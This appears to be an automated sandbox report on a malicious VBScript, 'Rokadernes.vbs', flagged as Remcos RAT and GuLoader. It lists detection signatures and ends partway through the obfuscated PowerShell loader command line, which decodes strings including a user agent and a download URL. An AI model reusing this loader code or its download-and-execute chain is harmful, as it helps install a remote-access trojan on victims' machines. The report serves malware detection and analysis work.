Edit tour
Windows
Analysis Report
Rokadernes.vbs
Overview
General Information
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Creates autostart registry keys with suspicious names
Found suspicious powershell code related to unpacking or dynamic code loading
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6740 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Rokad ernes.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 2504 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "echo $Tel ekabler; f unction Ka tukina($Fa ngedragter s){$Havanl ggene=4;$P rotestanti skes=$Hava nlggene;do {$Commissi onship161+ =$Fangedra gters[$Pro testantisk es];$Prote stantiskes +=5} until (!$Fangedr agters[$Pr otestantis kes])$Comm issionship 161}functi on Myndige s($Molossi an120){ .( $Butleress ) ($Moloss ian120)}$K atalogbest illing=Kat ukina ' ov lnTommE ej utAppe.Bes vW';$Katal ogbestilli ng+=Katuki na 'B kkEA ff.BU secS nitLBajai FilEFor nN onrT';$Syl terne=Katu kina 'Fort M S joSire zAnbeiSkab lThrol,hro aOpre/';$N onagricult ural=Katuk ina 'Non T SnerlStars Ruff1Revi2 ';$duplica nd='Slot[A nskNHypeeE tm tC ll.P gmsLimnE Ba RContvL istIOverCO verEHa nP StaotidsI, kolnkl,pt SinMBec.A, quiNSammAB arsgAfstEf ormrlege]O ve.:Om r:B hmns ribE A.lC ,otU goeRVejai Pu,tMondyO bskpGasvr Pr.ofru.tK anooBol cT e.moSperlR ech=mi l$ ftenHum O ystNPresAC ounGGappRS igii OupcS hrau acklS tutTTo.dUF igeR.harAR eacl';$Syl terne+=Kat ukina 'Sti l5Stin. Ma g0Sold Gra a(Lo rWSys tiMyxon Pr ed runoHel lwMests Pl a FrodNBir tT He V.s 1 Ble0Temp ..ili0Lill ; Pol Ka.e WIm ei ona n K i6N,ns 4Sulu;Kati Des,xVe.s 6gtev4Cusp ;Dial Kain rRaphvKomm :Slbe1Liti 3 Ue 1Tyra .smaa0So k ) Mya ,eco GBogeeRye. cHospkOptr oOeer/aspe 2Phe 0Sequ 1Topn0Disl 0Rets1 .lv 0Rist1 ,ch Kr oFGlai i lcrScale Unrufstoro Non,xTyra/ Di p1Gris3 Give1 Pul. Oxyh0';$Ko nfiguratio nsmanualer s=Katukina 'JustUlet tSAuspEPro tRVitr-End aaRastGMot oeDro nMil T';$Injur iesag=Katu kina 'Mash hFrictGaze tNoncpBefr s Ana:Fl n /St d/Petu o Towf Met 1,armxT.is . Onci No cU deu .ub /ShamCOppo AKur.CPren ZLi ikMacr c D.rP ung fWh.l/ ovs S BegcBore hDronmTele eSrgeetopo rRe h.Grun aUnjec nat a';$Taxifl yene192=Ka tukina 'P. em>';$Butl eress=Katu kina ' Aut i eroE D v X';$gruble des='Tyrol ervalsene' ;$overgrea siness='\W ealthmakin g.Asr';Myn diges (Kat ukina 'Ind s$anstGGl elUngroTor nBR.nda os alSeab:sku daGlanSOve rYDoweMUni mPdef,T El Oammot,el aeB dtST,o j=K rt$Ind beForsn Na V Spe:E.k aaGoldpRak kp AhmDQua naNeglTAff aaSarg+Ars i$SkriOSaf iVBarte In tRHoloGHis tRPyloe,li paSammsOve rISt.tN Op beTol s la vs');Myndi ges (Katuk ina 'Olde$ J,goG Endl Krito xtrB AcetAGarrl Plat:Fissc Ke.oHRenlo PricKBrils Vl eTvet A TrmlRTu gT Kale MulR Al nAfrue La.i= Paa$ OrdkiForsn Art.jCh fu N.rsrPhenI ,ugueBlacs Hemiasv,rG Lyri.Fjers rdpStivL SupIFo,otJ a.u( .en$A dgat n naL adyX ondiS ubsF Sa LS o dyS inE SveN UnfeM oni1Ca a9 ose2Coa.)' );Myndiges (Katukina $duplican d);$Injuri esag=$Chok starterne[ 0];$Remail =(Katukina 'Syzy$Pse uGCapnlE.r iOAns b .n daRomalGra n:BunkuBi eTSpa ISku eLEtambSul j icreArr olBlndiuan egHy r=Fly uNRougEfla